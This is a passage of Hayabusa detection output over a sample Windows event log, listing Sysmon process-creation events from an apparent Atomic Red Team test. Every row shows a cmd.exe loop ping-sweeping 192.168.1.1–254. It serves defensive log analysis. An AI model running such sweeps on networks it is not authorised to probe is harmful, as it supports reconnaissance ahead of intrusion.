14:53:08.521 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.188 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D954-5D31-0000-00108FBD3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:09.043 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.189 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-D955-5D31-0000-0010D6C03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:09.515 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.190 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 684 | PGUID: 747F3D96-D955-5D31-0000-0010C2C33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:10.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.191 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 504 | PGUID: 747F3D96-D956-5D31-0000-0010AEC63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:10.556 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.192 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6608 | PGUID: 747F3D96-D956-5D31-0000-00109AC93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:11.022 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.193 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1128 | PGUID: 747F3D96-D957-5D31-0000-001086CC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:11.504 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.194 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D957-5D31-0000-001072CF3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:12.040 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.195 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5244 | PGUID: 747F3D96-D958-5D31-0000-00105ED23600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:12.537 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.196 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4460 | PGUID: 747F3D96-D958-5D31-0000-001026DB3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:13.022 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.197 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-D959-5D31-0000-001016DE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:13.509 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.198 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-D959-5D31-0000-001007E13600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:14.020 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.199 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 936 | PGUID: 747F3D96-D95A-5D31-0000-0010F7E33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:14.513 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.200 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4480 | PGUID: 747F3D96-D95A-5D31-0000-0010EBE63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:15.001 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.201 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6464 | PGUID: 747F3D96-D95A-5D31-0000-0010DBE93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:15.518 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.202 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2392 | PGUID: 747F3D96-D95B-5D31-0000-0010CCEC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:16.026 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.203 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D95C-5D31-0000-001039F03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:16.521 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.204 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D95C-5D31-0000-0010F7F53600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:17.037 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.205 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 884 | PGUID: 747F3D96-D95D-5D31-0000-001001F93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:17.438 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.206 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D95D-5D31-0000-0010C8013700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:18.043 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.207 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3436 | PGUID: 747F3D96-D95E-5D31-0000-0010B5043700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:18.544 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.208 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6296 | PGUID: 747F3D96-D95E-5D31-0000-0010A1073700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:19.012 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.209 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D95F-5D31-0000-0010930A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:19.546 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.210 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6184 | PGUID: 747F3D96-D95F-5D31-0000-00107F0D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:20.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.211 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-D960-5D31-0000-00106B103700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:20.571 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.212 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D960-5D31-0000-001057133700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:21.020 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.213 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D961-5D31-0000-0010891F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:21.520 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.214 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2892 | PGUID: 747F3D96-D961-5D31-0000-001075223700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:22.035 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.215 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-D962-5D31-0000-001061253700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:22.520 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.216 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D962-5D31-0000-0010292E3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:23.011 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.217 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1996 | PGUID: 747F3D96-D963-5D31-0000-001016313700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:23.546 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.218 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D963-5D31-0000-001002343700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:23.993 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.219 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3896 | PGUID: 747F3D96-D963-5D31-0000-0010EF363700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:24.504 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.220 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6856 | PGUID: 747F3D96-D964-5D31-0000-0010DB393700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:25.008 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.221 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4932 | PGUID: 747F3D96-D965-5D31-0000-0010C73C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:25.544 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.222 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1220 | PGUID: 747F3D96-D965-5D31-0000-0010B53F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:26.004 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.223 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-D965-5D31-0000-0010A1423700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:26.430 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.224 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D966-5D31-0000-00108D453700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:27.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.225 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6632 | PGUID: 747F3D96-D967-5D31-0000-00107C483700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:27.555 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.226 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5844 | PGUID: 747F3D96-D967-5D31-0000-0010BB513700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:28.035 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.227 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6396 | PGUID: 747F3D96-D968-5D31-0000-001001553700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:28.511 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.228 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1452 | PGUID: 747F3D96-D968-5D31-0000-0010F3573700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:29.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.229 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-D969-5D31-0000-0010DF5A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:29.534 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.230 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D969-5D31-0000-0010CB5D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:30.034 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.231 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D96A-5D31-0000-0010B7603700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:30.521 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.232 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D96A-5D31-0000-0010A3633700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:31.013 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.233 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D96B-5D31-0000-001090663700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:31.530 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.234 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5016 | PGUID: 